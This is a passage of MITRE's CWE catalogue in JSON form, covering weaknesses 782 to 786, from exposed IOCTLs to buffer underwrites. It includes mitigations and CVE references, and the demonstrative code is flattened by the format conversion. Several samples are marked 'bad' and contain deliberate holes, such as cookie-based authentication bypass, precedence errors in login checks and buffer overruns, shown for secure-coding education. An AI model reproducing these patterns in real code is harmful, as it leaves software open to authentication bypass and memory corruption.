privileges, it might not be a priority for active attackers. However, remote exploitation may be possible for software such as device drivers. Even when remote vectors are not available, it may be useful as the final privilege-escalation step in multi-stage remote attacks against application-layer software, or as the primary attack by a local user on a multi-user system."]}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}]}},"782":{"attr":{"@_ID":"782","@_Name":"Exposed IOCTL with Insufficient Access Control","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software implements an IOCTL with functionality that should be restricted, but it does not properly enforce access control for the IOCTL.","Extended_Description":{"xhtml:p":["When an IOCTL contains privileged functionality and is exposed unnecessarily, attackers may be able to access this functionality by invoking the IOCTL. Even if the functionality is benign, if the programmer has assumed that the IOCTL would only be accessed by a trusted process, there may be little or no validation of the incoming data, exposing weaknesses that would never be reachable if the attacker cannot call the IOCTL directly.","The implementations of IOCTLs will differ between operating system types and versions, so the methods of attack and prevention may vary widely."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"749","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"781","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}}],"Operating_System":[{"attr":{"@_Class":"Unix","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Note":"Attackers can invoke any functionality that the IOCTL offers. Depending on the functionality, the consequences may include code execution, denial-of-service, and theft of data."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"In Windows environments, use proper access control for the associated device or device namespace. See References."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2208","Description":"Operating system does not enforce permissions on an IOCTL that can be used to modify network settings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2208"},{"Reference":"CVE-2008-3831","Description":"Device driver does not restrict ioctl calls to its direct rendering manager.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3831"},{"Reference":"CVE-2008-3525","Description":"ioctl does not check for a required capability before processing certain requests.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3525"},{"Reference":"CVE-2008-0322","Description":"Chain: insecure device permissions allows access to an IOCTL, allowing arbitrary memory to be overwritten.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0322"},{"Reference":"CVE-2007-4277","Description":"Chain: anti-virus product uses weak permissions for a device, leading to resultant buffer overflow in an exposed IOCTL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4277"},{"Reference":"CVE-2007-1400","Description":"Chain: sandbox allows opening of a TTY device, enabling shell commands through an exposed ioctl.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1400"},{"Reference":"CVE-2006-4926","Description":"Anti-virus product uses insecure security descriptor for a device driver, allowing access to a privileged IOCTL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4926"},{"Reference":"CVE-1999-0728","Description":"Unauthorized user can disable keyboard or mouse by directly invoking a privileged IOCTL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0728"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-701"}}},"Notes":{"Note":[{"#text":"This can be primary to many other weaknesses when the programmer assumes that the IOCTL can only be accessed by trusted parties. For example, a program or driver might not validate incoming addresses in METHOD_NEITHER IOCTLs in Windows environments (CWE-781), which could allow buffer overflow and similar attacks to take place, even when the attacker never should have been able to access the IOCTL at all.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"Because IOCTL functionality is typically performing low-level actions and closely interacts with the operating system, this weakness may only appear in code that is written in low-level languages."}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"}]}},"783":{"attr":{"@_ID":"783","@_Name":"Operator Precedence Logic Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program uses an expression in which operator precedence causes incorrect logic to be used.","Extended_Description":"While often just a bug, operator precedence logic errors can have serious consequences if they are used in security-critical code, such as making an authentication decision.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Rarely"}},{"attr":{"@_Name":"C++","@_Prevalence":"Rarely"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Rarely"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Logic errors related to operator precedence may cause problems even during normal operation, so they are probably discovered quickly during the testing phase. If testing is incomplete or there is a strong reliance on manual review of the code, then these errors may not be discovered before the software is deployed."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Varies by Context","Unexpected State"],"Note":"The consequences will vary based on the context surrounding the incorrect precedence. In a security decision, integrity or confidentiality are the most likely results. Otherwise, a crash may occur due to the software reaching an unexpected state."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Regularly wrap sub-expressions in parentheses, especially in security-critical code."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following example, the method validateUser makes a call to another method to authenticate a username and password for a user and returns a success or failure code.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define FAIL 0#define SUCCESS 1...int validateUser(char *username, char *password) {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int isUser = FAIL;if (isUser = AuthenticateUser(username, password) == FAIL) {}else {}return isUser;","xhtml:br":["","","","","","","","",""],"xhtml:i":["// call method to authenticate username and password","// if authentication fails then return failure otherwise return success"],"xhtml:div":[{"#text":"return isUser;","attr":{"@_style":"margin-left:10px;"}},{"#text":"isUser = SUCCESS;","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...if ((isUser = AuthenticateUser(username, password)) == FAIL) {...","xhtml:br":["","","",""]}}],"Body_Text":"However, the method that authenticates the username and password is called within an if statement with incorrect operator precedence logic. Because the comparison operator \\"==\\" has a higher precedence than the assignment operator \\"=\\", the comparison operator will be evaluated first and if the method returns FAIL then the comparison will be true, the return variable will be set to true and SUCCESS will be returned. This operator precedence logic error can be easily resolved by properly using parentheses within the expression of the if statement, as shown below."},{"Intro_Text":"In this example, the method calculates the return on investment for an accounting/financial application. The return on investment is calculated by subtracting the initial investment costs from the current value and then dividing by the initial investment costs.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public double calculateReturnOnInvestment(double currentValue, double initialInvestment) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double returnROI = 0.0;returnROI = currentValue - initialInvestment / initialInvestment;return returnROI;","xhtml:br":["","","","","",""],"xhtml:i":"// calculate return on investment"}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"...returnROI = (currentValue - initialInvestment) / initialInvestment;...","xhtml:br":["","","",""]}}],"Body_Text":["However, the return on investment calculation will not produce correct results because of the incorrect operator precedence logic in the equation. The divide operator has a higher precedence than the minus operator, therefore the equation will divide the initial investment costs by the initial investment costs which will only subtract one from the current value. Again this operator precedence logic error can be resolved by the correct use of parentheses within the equation, as shown below.","Note that the initialInvestment variable in this example should be validated to ensure that it is greater than zero to avoid a potential divide by zero error (CWE-369)."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-2516","Description":"Authentication module allows authentication bypass because it uses \\"(x = call(args) == SUCCESS)\\" instead of \\"((x = call(args)) == SUCCESS)\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2516"},{"Reference":"CVE-2008-0599","Description":"Chain: Language interpreter calculates wrong buffer size (CWE-131) by using \\"size = ptr ? X : Y\\" instead of \\"size = (ptr ? X : Y)\\" expression.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0599"},{"Reference":"CVE-2001-1155","Description":"Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP00-C","Entry_Name":"Use parentheses for precedence of operation","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP04-PL","Entry_Name":"Do not mix the early-precedence logical operators with late-precedence logical operators","Mapping_Fit":"CWE More Abstract"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-704"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Precedence", Page 287"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-16"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"784":{"attr":{"@_ID":"784","@_Name":"Reliance on Cookies without Validation and Integrity Checking in a Security Decision","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application uses a protection mechanism that relies on the existence or values of a cookie, but it does not properly ensure that the cookie is valid for the associated user.","Extended_Description":"Attackers can easily modify cookies, within the browser or by implementing the client-side code outside of the browser. Attackers can bypass protection mechanisms such as authorization and authentication by modifying the cookie to contain an expected value.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"807","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"565","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"It is dangerous to use cookies to set a user\'s privileges. The cookie can be manipulated to claim a high level of authorization, or to claim that successful authentication has occurred."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Avoid using cookie data for a security-related decision."},{"Phase":"Implementation","Description":"Perform thorough input validation (i.e.: server side validation) on the cookie data if you\'re going to use it for a security related decision."},{"Phase":"Architecture and Design","Description":"Add integrity checks to detect tampering."},{"Phase":"Architecture and Design","Description":"Protect critical cookies from replay attacks, since cross-site scripting or other attacks may allow attackers to steal a strongly-encrypted cookie that also passes integrity checks. This mitigation applies to cookies that should only be valid during a single transaction or session. By enforcing timeouts, you may limit the scope of an attack. As part of your integrity check, use an unpredictable, server-side value that is not exposed to the client."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-15"},"Intro_Text":"The following code excerpt reads a value from a browser cookie to determine the role of the user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"role\\")) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"userRole = c.getValue();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-16"},"Intro_Text":"The following code could be for a medical records application. It performs authentication by checking if a cookie has been set.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$auth = $_COOKIES[\'authenticated\'];if (! $auth) {}DisplayMedicalHistory($_POST[\'patient_ID\']);","xhtml:br":["",""],"xhtml:div":{"#text":"if (AuthenticateUser($_POST[\'user\'], $_POST[\'password\']) == \\"success\\") {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"// save the cookie to send out in future responsessetcookie(\\"authenticated\\", \\"1\\", time()+60*60*2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"ShowLoginScreen();die(\\"\\\\n\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}},"Body_Text":["The programmer expects that the AuthenticateUser() check will always be applied, and the \\"authenticated\\" cookie will only be set when authentication succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie.","However, the attacker can set the \\"authenticated\\" cookie to a non-zero value such as 1. As a result, the $auth variable is 1, and the AuthenticateUser() check is not even performed. The attacker has bypassed the authentication."]},{"attr":{"@_Demonstrative_Example_ID":"DX-17"},"Intro_Text":"In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"authenticated\\") && Boolean.TRUE.equals(c.getValue())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"authenticated = true;","attr":{"@_style":"margin-left:10px;"}}}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-1549","Description":"Attacker can bypass authentication by setting a cookie to a specific value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1549"},{"Reference":"CVE-2009-1619","Description":"Attacker can bypass authentication and gain admin privileges by setting an \\"admin\\" cookie to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1619"},{"Reference":"CVE-2009-0864","Description":"Content management system allows admin privileges by setting a \\"login\\" cookie to \\"OK.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0864"},{"Reference":"CVE-2008-5784","Description":"e-dating application allows admin privileges by setting the admin cookie to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5784"},{"Reference":"CVE-2008-6291","Description":"Web-based email list manager allows attackers to gain admin privileges by setting a login cookie to \\"admin.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6291"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-706"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 13, "Sensitive Data in Cookies and Fields" Page 435"}}]},"Notes":{"Note":{"#text":"A new parent might need to be defined for this entry. This entry is specific to cookies, which reflects the significant number of vulnerabilities being reported for cookie-based authentication in CVE during 2008 and 2009. However, other types of inputs - such as parameters or headers - could also be used for similar authentication or authorization. Similar issues (under the Research view) include CWE-247 and CWE-472.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-16"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"785":{"attr":{"@_ID":"785","@_Name":"Use of Path Manipulation Function without Maximum-sized Buffer","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software invokes a function for normalizing paths or file names, but it provides an output buffer that is smaller than the maximum possible size, such as PATH_MAX.","Extended_Description":"Passing an inadequately-sized output buffer to a path manipulation function can result in a buffer overflow. Such functions include realpath(), readlink(), PathAppend(), and others.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"676","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"120","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":"Windows provides a large number of utility functions that manipulate buffers containing filenames. In most cases, the result is returned in a buffer that is passed in as input. (Usually the filename is modified in place.) Most functions require the buffer to be at least MAX_PATH bytes in length, but you should check the documentation for each function individually. If the buffer is not large enough to store the result of the manipulation, a buffer overflow can occur."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Always specify output buffers large enough to handle the maximum-size possible result from path manipulation functions."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example the function creates a directory named \\"output\\\\<name>\\" in the current directory and returns a heap-allocated copy of its name.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *createOutputDirectory(char *name) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char outputDirectoryName[128];if (getCurrentDirectory(128, outputDirectoryName) == 0) {}if (!PathAppend(outputDirectoryName, \\"output\\")) {}if (!PathAppend(outputDirectoryName, name)) {}if (SHCreateDirectoryEx(NULL, outputDirectoryName, NULL) != ERROR_SUCCESS) {}return StrDup(outputDirectoryName);","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"return null;","attr":{"@_style":"margin-left:10px;"}},{"#text":"return null;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return null;","xhtml:br":""}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return null;","xhtml:br":""}}]}}}},"Body_Text":"For most values of the current directory and the name parameter, this function will work properly. However, if the name parameter is particularly long, then the second call to PathAppend() could overflow the outputDirectoryName buffer, which is smaller than MAX_PATH bytes."}},"Affected_Resources":{"Affected_Resource":["Memory","File or Directory"]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Often Misused: File System"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP9","Entry_Name":"Faulty String Expansion"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"This entry is at a much lower level of abstraction than most entries because it is function-specific. It also has significant overlap with other entries that can vary depending on the perspective. For example, incorrect usage could trigger either a stack-based overflow (CWE-121) or a heap-based overflow (CWE-122). The CWE team has not decided how to handle such entries.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2009-07-27","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified before initial publication."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Demonstrative_Examples, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"786":{"attr":{"@_ID":"786","@_Name":"Access of Memory Location Before Start of Buffer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software reads or writes to a buffer using an index or pointer that references a memory location prior to the beginning of the buffer.","Extended_Description":"This typically occurs when a pointer or its index is decremented to a position before the buffer, when pointer arithmetic results in a position before the beginning of the valid memory location, or when a negative index is used.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"For an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences."},{"Scope":["Integrity","Availability"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart"],"Note":"Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash."},{"Scope":"Integrity","Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"If the corrupted memory can be effectively controlled, it may be possible to execute arbitrary code. If the corrupted memory is data rather than instructions, the system will continue to function with improper changes, possibly in violation of an implicit or explicit policy."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-87"},"Intro_Text":"In the following C/C++ example, a utility function is used to trim trailing whitespace from a character string. The function copies the input string to a local character string and uses a while statement to remove the trailing whitespace by moving backward through the string and overwriting whitespace with a NUL character.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* trimTrailingWhitespace(char *strMessage, int length) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *retMessage;char *message = malloc(sizeof(char)*(length+1));char message[length+1];int index;for (index = 0; index < length; index++) {}message[index] = \'\\\\0\';int len = index-1;while (isspace(message[len])) {}retMessage = message;return retMessage;","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":["// copy input string to a temporary string","// trim trailing whitespace","// return string without trailing whitespace"],"xhtml:div":[{"#text":"message[index] = strMessage[index];","attr":{"@_style":"margin-left:10px;"}},{"#text":"message[len] = \'\\\\0\';len--;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"However, this function can cause a buffer underwrite if the input character string contains all whitespace. On some systems the while statement will move backwards past the beginning of a character string and will call the isspace() function on an address outside of the bounds of the local buffer."},{"attr":{"@_Demonstrative_Example_ID":"DX-90"},"Intro_Text":"The following example asks a user for an offset into an array to select an item.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main (int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *items[] = {\\"boat\\", \\"car\\", \\"truck\\", \\"train\\"};int index = GetUntrustedOffset();printf(\\"You selected %s\\\\n\\", items[index-1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126)."},{"attr":{"@_Demonstrative_Example_ID":"DX-88"},"Intro_Text":"The following is an example of code that may result in a buffer underwrite, if find() returns a negative value to indicate that ch is not found in srcBuf:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main() {}","xhtml:div":{"#text":"...strncpy(destBuf, &srcBuf[find(srcBuf, ch)], 1024);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"If the index to srcBuf is somehow under user control, this is an arbitrary write-what-where condition."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2227","Description":"Unchecked length of SSLv2 challenge value leads to buffer underflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2227"},{"Reference":"CVE-2007-4580","Description":"Buffer underflow from a small size value with a large buffer (length parameter inconsistency, CWE-130)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4580"},{"Reference":"CVE-2007-1584","Description":"Buffer underflow from an all-whitespace string, which causes a counter to be decremented before the buffer while looking for a non-whitespace character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1584"},{"Reference":"CVE-2007-0886","Description":"Buffer underflow resultant from encoded data that triggers an integer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0886"},{"Reference":"CVE-2006-6171","Description":"Product sets an incorrect buffer size limit, leading to \\"off-by-two\\" buffer underflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6171"},{"Reference":"CVE-2006-4024","Description":"Negative value is used in a memcpy() operation, leading to buffer 